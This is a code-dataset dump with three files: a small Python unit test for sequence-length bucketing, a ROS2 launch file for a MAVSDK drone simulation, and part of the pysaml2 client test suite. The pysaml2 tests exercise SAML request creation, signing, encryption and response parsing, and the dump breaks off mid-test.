max_stars_repo_path (stringlengths 4-286) | max_stars_repo_name (stringlengths 5-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.03M) | content_cleaned (stringlengths 6-1.03M) | language (stringclasses, 111 values) | language_score (float64 0.03-1) | comments (stringlengths 0-556k) | edu_score (float64 0.32-5.03) | edu_int_score (int64 0-5)
---|---|---|---|---|---|---|---|---|---|---|
tfkstbd/tests/test_check.py | shkarupa-alex/tfstbd | 0 | 6632451 | <filename>tfkstbd/tests/test_check.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from collections import Counter
from ..check import mean_waste, estimate_buckets, estimate_batches
class TestMeaningWaste(unittest.TestCase):
def testNormal(self):
source = Counter({1: 5, 2: 2, 3: 1})
result = mean_waste(source)
self.assertEqual(0.5, result)
class TestEstimateBuckets(unittest.TestCase):
def testNormal(self):
source = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
result = estimate_buckets(source)
self.assertListEqual([262, 268, 274, 281, 287, 294, 301], result)
class TestEstimateBatches(unittest.TestCase):
def testNormal(self):
source_lens = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
source_bucks = [262, 268, 274, 281, 287, 294, 301]
result = estimate_batches(source_lens, source_bucks, 1024)
self.assertListEqual([1.177, 1.15, 1.124, 1.096, 1.074, 1.048, 1.024, 1.0], result)
| en | 0.769321 | # -*- coding: utf-8 -*- | 2.428773 | 2 |
launch/drone_sim.launch.py | slaghuis/drone_mavsdk | 2 | 6632452 | <filename>launch/drone_sim.launch.py
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
ld = LaunchDescription()
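    # Static identity transform (zero translation, identity quaternion) from "map" to "odom"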
map_odom_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','0','0','0','1','map','odom']
)
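    # Static transform from "map" to "odom_ned": yaw ~1.57 rad, roll ~3.14 rad, i.e. roughly an ENU-to-NED frame rotation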
map_odom_ned_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','1.57', '0', '3.14','map','odom_ned']
)
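    # Drone node talking MAVSDK to the autopilot over udp://:14540 (the usual PX4 SITL port)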
drone_node = Node(
package="drone",
executable="drone_node",
name="drone_node",
output="screen",
emulate_tty=True,
parameters=[
{"connection_url": "udp://:14540"},
{"height_topic": "sonar/range"},
{"height_sensor_z_offset": 0.153}
]
)
odom_tf2_broadcaster = Node(
package="drone",
executable="odom_tf2_broadcaster",
output="screen",
emulate_tty=True
)
ld.add_action(map_odom_tf)
ld.add_action(map_odom_ned_tf)
ld.add_action(drone_node)
ld.add_action(odom_tf2_broadcaster)
return ld
| none | 1 | 2.411631 | 2 |
|
tests/test_51_client.py | cmurphy/pysaml2 | 0 | 6632453 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import uuid
import six
from future.backports.urllib.parse import parse_qs
from future.backports.urllib.parse import urlencode
from future.backports.urllib.parse import urlparse
from pytest import raises
from saml2.argtree import add_path
from saml2.cert import OpenSSLWrapper
from saml2.xmldsig import SIG_RSA_SHA256
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import config
from saml2 import class_name
from saml2 import extension_elements_to_elements
from saml2 import saml
from saml2 import samlp
from saml2 import sigver
from saml2 import s_utils
from saml2.assertion import Assertion
from saml2.extension.requested_attributes import RequestedAttributes
from saml2.extension.requested_attributes import RequestedAttribute
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.client import Saml2Client
from saml2.pack import parse_soap_enveloped_saml
from saml2.response import LogoutResponse
from saml2.saml import NAMEID_FORMAT_PERSISTENT, EncryptedAssertion, Advice
from saml2.saml import NAMEID_FORMAT_TRANSIENT
from saml2.saml import NameID
from saml2.samlp import SessionIndex
from saml2.server import Server
from saml2.sigver import pre_encryption_part, pre_encrypt_assertion
from saml2.sigver import rm_xmltag
from saml2.sigver import verify_redirect_signature
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.time_util import in_a_while, a_while_ago
from defusedxml.common import EntitiesForbidden
from fakeIDP import FakeIDP
from fakeIDP import unpack_form
from pathutils import full_path
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
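# Python 2/3 compatibility: prefer base64.encodebytes, fall back to
# base64.encodestring (removed in Python 3.9).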
encode_fn = getattr(base64, 'encodebytes', base64.encodestring)
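# Create a throw-away certificate/key pair signed by the test CA under root_cert/.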
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
req_cert_str)
return cert_str, req_key_str
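# Splice a serialized sub-element into an XML string by replacing the matching
# self-closing tag with an opening/closing pair wrapped around the sub-element.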
def add_subelement(xmldoc, node_name, subelem):
s = xmldoc.find(node_name)
if s > 0:
x = xmldoc.rindex("<", 0, s)
tag = xmldoc[x + 1:s - 1]
c = s + len(node_name)
spaces = ""
while xmldoc[c] == " ":
spaces += " "
c += 1
# Sometimes we get an xml header, sometimes we don't.
subelem_str = str(subelem)
if subelem_str[0:5].lower() == '<?xml':
subelem_str = subelem_str.split("\n", 1)[1]
xmldoc = xmldoc.replace(
"<%s:%s%s/>" % (tag, node_name, spaces),
"<%s:%s%s>%s</%s:%s>" % (tag, node_name, spaces, subelem_str, tag,
node_name))
return xmldoc
def for_me(condition, me):
for restriction in condition.audience_restriction:
audience = restriction.audience
if audience.text.strip() == me:
return True
def ava(attribute_statement):
result = {}
for attribute in attribute_statement.attribute:
# Check name_format ??
name = attribute.name.strip()
result[name] = []
for value in attribute.attribute_value:
result[name].append(value.text.strip())
return result
def _leq(l1, l2):
return set(l1) == set(l2)
REQ1 = {"1.2.14": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1"
IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2
.0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2
.0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>""",
"1.2.16": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp
.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example
.com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>"""}
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
def list_values2simpletons(_dict):
return dict([(k, v[0]) for k, v in _dict.items()])
class TestClient:
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = Saml2Client(conf)
def teardown_class(self):
self.server.close()
def test_create_attribute_query1(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
reqstr = "%s" % req.to_string().decode()
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
issuer = req.issuer
assert issuer.text == "urn:mace:example.com:saml:roland:sp"
attrq = samlp.attribute_query_from_string(reqstr)
assert _leq(attrq.keyswv(), ['destination', 'subject', 'issue_instant',
'version', 'id', 'issuer'])
assert attrq.destination == req.destination
assert attrq.id == req.id
assert attrq.version == req.version
assert attrq.issuer.text == issuer.text
assert attrq.issue_instant == req.issue_instant
assert attrq.subject.name_id.format == name_id.format
assert attrq.subject.name_id.text == name_id.text
def test_create_attribute_query2(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
attribute={
("urn:oid:2.5.4.42",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"givenName"): None,
("urn:oid:2.5.4.4",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"surname"): None,
("urn:oid:1.2.840.113549.1.9.1",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"): None,
},
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
assert len(req.attribute) == 3
# one is givenName
seen = []
for attribute in req.attribute:
if attribute.name == "urn:oid:2.5.4.42":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "givenName"
seen.append("givenName")
elif attribute.name == "urn:oid:2.5.4.4":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "surname"
seen.append("surname")
elif attribute.name == "urn:oid:1.2.840.113549.1.9.1":
assert attribute.name_format == saml.NAME_FORMAT_URI
if getattr(attribute, "friendly_name"):
assert False
seen.append("email")
assert _leq(seen, ["givenName", "surname", "email"])
def test_create_attribute_query_3(self):
req_id, req = self.client.create_attribute_query(
"https://aai-demo-idp.switch.ch/idp/shibboleth",
"_e7b68a04488f715cda642fbdd90099f5",
format=saml.NAMEID_FORMAT_TRANSIENT,
message_id="id1")
assert isinstance(req, samlp.AttributeQuery)
assert req.destination == "https://aai-demo-idp.switch" \
".ch/idp/shibboleth"
assert req.id == "id1"
assert req.version == "2.0"
assert req.issue_instant
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
nameid = req.subject.name_id
assert nameid.format == saml.NAMEID_FORMAT_TRANSIENT
assert nameid.text == "_e7b68a04488f715cda642fbdd90099f5"
def test_create_auth_request_0(self):
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_TRANSIENT
node_requested_attributes = None
for e in ar.extensions.extension_elements:
if e.tag == RequestedAttributes.c_tag:
node_requested_attributes = e
break
assert node_requested_attributes is not None
for c in node_requested_attributes.children:
assert c.tag == RequestedAttribute.c_tag
assert c.attributes['isRequired'] in ['true', 'false']
assert c.attributes['Name']
assert c.attributes['FriendlyName']
assert c.attributes['NameFormat']
def test_create_auth_request_unset_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1")
assert bool(req.force_authn) == False
def test_create_auth_request_set_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1",
force_authn="true")
assert bool(req.force_authn) == True
def test_create_auth_request_nameid_policy_allow_create(self):
conf = config.SPConfig()
conf.load_file("sp_conf_nameidpolicy")
client = Saml2Client(conf)
ar_str = "%s" % client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "true"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
def test_create_auth_request_vo(self):
assert list(self.client.config.vorg.keys()) == [
"urn:mace:example.com:it:tek"]
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso",
"urn:mace:example.com:it:tek", # vo
nameid_format=NAMEID_FORMAT_PERSISTENT,
message_id="666")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.id == "666"
assert ar.assertion_consumer_service_url == "http://lingon.catalogix" \
".se:8087/"
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
assert nid_policy.sp_name_qualifier == "urn:mace:example.com:it:tek"
def test_sign_auth_request_0(self):
req_id, areq = self.client.create_authn_request(
"http://www.example.com/sso", sign=True, message_id="id1")
ar_str = "%s" % areq
ar = samlp.authn_request_from_string(ar_str)
assert ar
assert ar.signature
assert ar.signature.signature_value
signed_info = ar.signature.signed_info
assert len(signed_info.reference) == 1
assert signed_info.reference[0].uri == "#id1"
assert signed_info.reference[0].digest_value
try:
assert self.client.sec.correctly_signed_authn_request(
ar_str, self.client.config.xmlsec_binary,
self.client.config.metadata)
except Exception: # missing certificate
self.client.sec.verify_signature(ar_str, node_name=class_name(ar))
def test_create_logout_request(self):
req_id, req = self.client.create_logout_request(
"http://localhost:8088/slo", "urn:mace:example.com:saml:roland:idp",
name_id=nid, reason="Tired", expire=in_a_while(minutes=15),
session_indexes=["_foo"])
assert req.destination == "http://localhost:8088/slo"
assert req.reason == "Tired"
assert req.version == "2.0"
assert req.name_id == nid
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
assert req.session_index == [SessionIndex("_foo")]
def test_response_1(self):
IDP = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id_policy=nameid_policy,
sign_response=True,
userid="<EMAIL>",
authn=AUTHN)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
assert authn_response is not None
assert authn_response.issuer() == IDP
assert authn_response.response.assertion[0].issuer.text == IDP
session_info = authn_response.session_info()
assert session_info["ava"] == {'mail': ['<EMAIL>'],
'givenName': ['Derek'],
'sn': ['Jeter'],
'title': ["The man"]}
assert session_info["issuer"] == IDP
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
assert "session_index" in session_info
# One person in the cache
assert len(self.client.users.subjects()) == 1
subject_id = self.client.users.subjects()[0]
# The information I have about the subject comes from one source
assert self.client.users.issuers_of_info(subject_id) == [IDP]
# --- authenticate another person
ava = {"givenName": ["Alfonson"], "sn": ["Soriano"],
"mail": ["<EMAIL>"], "title": ["outfielder"]}
resp_str = "%s" % self.server.create_authn_response(
identity=ava,
in_response_to="id2",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
sign_response=True,
name_id_policy=nameid_policy,
userid="<EMAIL>",
authn=AUTHN)
resp_str = encode_fn(resp_str.encode())
self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id2": "http://foo.example.com/service"})
# Two persons in the cache
assert len(self.client.users.subjects()) == 2
issuers = [self.client.users.issuers_of_info(s) for s in
self.client.users.subjects()]
# The information I have about the subjects comes from the same source
assert issuers == [[IDP], [IDP]]
def test_response_2(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_3(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_4(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_5(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_6(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_assertion_str, cert_key_assertion_str = generate_cert()
cert_assertion = \
{
"cert": cert_assertion_str,
"key": cert_key_assertion_str
}
cert_advice_str, cert_key_advice_str = generate_cert()
cert_advice = \
{
"cert": cert_advice_str,
"key": cert_key_advice_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_assertion_str,
encrypt_cert_advice=cert_advice_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"},
{"id1": [cert_assertion, cert_advice]})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_7(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_8(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def setup_verify_authn_response(self):
idp = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
ava_verify = {'mail': ['<EMAIL>'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
return idp, ava, ava_verify, nameid_policy
def verify_authn_response(self, idp, authn_response, _client, ava_verify):
assert authn_response is not None
assert authn_response.issuer() == idp
assert authn_response.assertion.issuer.text == idp
session_info = authn_response.session_info()
assert session_info["ava"] == ava_verify
assert session_info["issuer"] == idp
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
# One person in the cache
assert len(_client.users.subjects()) == 1
subject_id = _client.users.subjects()[0]
# The information I have about the subject comes from one source
assert _client.users.issuers_of_info(subject_id) == [idp]
def test_init_values(self):
entityid = self.client.config.entityid
assert entityid == "urn:mace:example.com:saml:roland:sp"
location = self.client._sso_location()
assert location == 'http://localhost:8088/sso'
my_name = self.client._my_name()
assert my_name == "urn:mace:example.com:saml:roland:sp"
def test_sign_then_encrypt_assertion(self):
        # Begin with the IdP's side
_sec = self.server.sec
assertion = s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=factory(
saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=full_path("test.key"),
node_id=assertion.id)
# Create an Assertion instance from the signed assertion
_ass = saml.assertion_from_string(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
assertion=_ass
)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part())
seresp = samlp.response_from_string(enctext)
# Now over to the client side
_csec = self.client.sec
if seresp.encrypted_assertion:
decr_text = _csec.decrypt(enctext)
seresp = samlp.response_from_string(decr_text)
resp_ass = []
sign_cert_file = full_path("test.pem")
for enc_ass in seresp.encrypted_assertion:
assers = extension_elements_to_elements(
enc_ass.extension_elements, [saml, samlp])
for ass in assers:
if ass.signature:
if not _csec.verify_signature("%s" % ass,
sign_cert_file,
node_name=class_name(
ass)):
continue
resp_ass.append(ass)
seresp.assertion = resp_ass
seresp.encrypted_assertion = None
assert seresp.assertion
def test_sign_then_encrypt_assertion2(self):
        # Begin with the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
name_id=factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion']
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=self.client.sec.key_file,
node_id=assertion.id)
sigass = rm_xmltag(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
encrypted_assertion=EncryptedAssertion()
)
xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
enctext = _sec.crypto.encrypt_assertion(xmldoc,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
        # Explicitly allow unsigned responses for this and the following 2 tests
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.ava == {'givenName': ['Derek'], 'sn': ['Jeter']}
def test_sign_then_encrypt_assertion_advice_1(self):
        # Begin with the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
subject_confirmation_specs = {
